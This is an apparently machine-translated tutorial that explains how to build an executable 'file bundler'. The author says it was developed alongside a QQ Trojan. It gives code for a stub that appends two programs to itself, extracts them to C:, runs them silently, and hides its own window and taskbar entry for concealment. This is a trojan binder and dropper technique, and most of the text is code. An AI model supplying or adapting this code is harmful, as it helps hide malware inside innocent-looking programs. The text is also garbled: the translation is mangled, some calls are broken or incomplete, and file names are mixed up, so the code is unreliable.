Write a file bundle in 2002, it was written in a QQ Trojan written in conjunction with yourself. Later, I asked someone on a forum. I turned out the previous procedure and wrote this document. When I finished the hard disk today, I made this article up. It is actually very simple.
File bundles can be used in many places, such as Trojans. You can also bundle the DLL behind the exe file when you issue software, and then dynamically call DLL, etc. when Exe is executed. .
Compilation environment: Win2K VC6.
First assume that we have to bundle Test1.exe and Test2.exe into target.exe files, and then run Test1.exe and Test2.exe when running Target.exe.
Try a small common sense, the PE format file is not modified in the middle of the file header and file, but only add data at the end of the file, then this PE file can be performed normally. You can try it to execute the copy test1.exe test2.exe in the command line mode. After the command is executed, Test2.exe is added to the TEST1.EXE file, and the merged test1.exe is normal, but Test2. EXE is not executed. OK, this is what we have to solve today. My thoughts are like this. Belt three files together, and then Target.exe actually contains three files, where AAA.exe is our own written program, Test1.exe and Test2.exe are programs we have to bundle.
Structure is as follows
---------------------------------------
| aaa.exe | TEST1.EXE | TEST2.EXE |
---------------------------------------
The entire file is called Target.exe, if the structure is as follows, then we actually only AAA.exe will be implemented when we perform Target.exe, and the aaa.exe here is written by our own, let's let Aaa.exe Do more do things, what he wants is: 1. Save the test2.exe to C: test2.exe, read the contents of Test1.exe to Save C: Test1.exe. 2. Call CREATEPROCESS to create two new processes run Test1.exe and Test2.exe. 3, call EXITPROCESS to end its own process.
This way, our goal is reached. At the same time, for the sake of concealed, we can display the AAA.exe window interface.
But there is another problem, how can I tell which data is Test1.exe when reading? Which data is Test2.exe? Then let's find a way to expand the above structure.
-------------------------------------------------- --- | AAA.EXE | TEST1.EXE | TEST2.EXE | LEN2 | LEN1 | ------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------- In the final end of the file, add two data, used to store the file length of Test1.exe and the file length of Test2.exe . And fixed Len2 and Len1 are lengths of 30 bytes. In this way, the two 30-byte contents of the first surface when AAA.exe are executed, the content is the length of the two files, and then the contents of Test1.exe and Test1.exe can be accurate according to both length. Take a look at the key code of the aaa.exe program: cfile fsource (_pgmptr, cfile :: modeRead | cfile :: modenotruncate); // Get the file length of target.exe Int isourceLength = fsource.getlength (); fsource.seek (isourceLength- 60, cfile :: begin; // mobile file pointer to the end of the Test2.exe file Char Buffer [40]; ZeromeMory (Buffer, 40); Fsource.Read (Buffer, 30); // Reads Len2 Content, Test2.exe's length Int itargetLength = ATOI (Buffer); FSource.seek (isourceLength-itrgetLength-60, cfile :: begin); // Mobile file pointer to the beginning of the test2.exe file CFILE FTARGET ("c : /TEST2.EXE ", CFILE :: MODECREATE | CFILE :: Mode | CFILE :: MODENOTRUNCATE); // Create a new file for c: /test2.exe char * pBuffer = new char [itargetLength]; // Assign buffer ZeromeMory (PBuffer, ItargetLength); fsource.read (PBuffer, ItargetLength); // reads the Test2.exe file to the buffer ftarget.write (PBuffer, ITARGETLENGTH); // Write the buffer content into C: Test2. Exe delete [] PBuffer; Ok, now the test2.exe file has been read, then read the content of Test1.exe, the process is similar
Fsource.seek (isourceLength-30, cfile :: begin); // Move the file pointer to the beginning of Len1 ZeromeMory (buffer, 40); // Read Len1 content, Len1 The content is the length of the test1.exe file int filelen = atoi; fsource.seek (isourceLength-60-filelen-itrgetLength, cfile :: begin); // Move the file pointer to the Test1.exe file ftarget.open "C: / Test2.exe", CFile :: MODECREATE | CFILE :: ModeWrite | CFile :: MODENOTRUNCATE); PBUFFER = New Char [filelen]; zeromeMory (PBuffer, Filelen); fsource.read (PBuffer, Filelen); / / Read the Test1.exe file to the buffer ftarget.write (PBuffer, Filelen); // Write the Test1.exe file into C: Test1.exe delete [] pBuffer; fsource.close (); ftarget.close (); ftarget.close (); Now we use createProcess to run Create two new processes can run C: Test1.exe and C: Test2.exe. Creating a new process is very simple. I will not write. This part is written, but the part of our bundled file has not been written, renovating a dialog-based program.
Cfile Fsource ("c: /aaa.exe", cfile :: modeReadwrite | cfile :: modenotruncate; // is the above we write aaa.exe fsource.seektoend (); // mobile file pointer to file tail cfile ffirstfile ( M_FirstFile, cfile :: modeRuncate; // This code is added to the Test1.exe to the AAA.exe tail INT Ilen = ffirstfile.getLength (); int Len = len; char * pBuffer = new char [ ilen]; ZeroMemory (pBuffer, ilen); fFirstFile.Read (pBuffer, ilen); fSource.Write (pBuffer, ilen); fFirstFile.Close (); delete pBuffer; CFile fSecondFile (m_SecondFile, CFile :: modeRead | CFile :: MODENOTRUNCATE); // This code is Ilen = fsecondfile.getLength (); pBuffer (PBuffer, Ilen); fsecondfile.read (PBuffer, Ilen); fsecondfile.read (PBuffer, Ilen); fSource.write PBuffer, Ilen); fsecondfile.close (); delete pBuffer; char Tempbuffer [30]; // converts Test2.exe length into strings, add spaces to 30 if the length is not 30, add space to 30, add to the file tail ZeromeMory Tempbuffer, 30); ITOA (Ilen, Tempbuffer, 10); While (TempBuffer <30) {strat (TempBuffer, ");} fsource.write (TempBuffer, 30); ZE Romemory (TempBuffer, 30); // converts the length of Test2.exe into strings, add spaces to 30 if the length is not 30, add it to the file tail ITOA (Len, Tempbuffer, 10); while (Strlen (TempBuffer) <30) {strat (Tempbuffer, ");} fsource.write (TempBuffer, 30); fsource.close (); :: MessageBox (NULL," Bundle Complete "," Tips ", MB_ICONINFORMATION); OK, so us A new file Target.exe has been generated, which has already been said. After performing Target.exe, AAA.exe first is executed, then Test1.exe and Test2.exe will execute. In order to enhance conceal, we will write down the following code in the oninitdialog () function of AAA.exe: ModifyStyleex (WS_EX_APPWINDOW, WS_EX_TOOLWINDOW); :: MoveWindow (M_HWND, 0, 0, 0, True); so AAA.exe There is no window when you don't display the task bar on the taskbar.
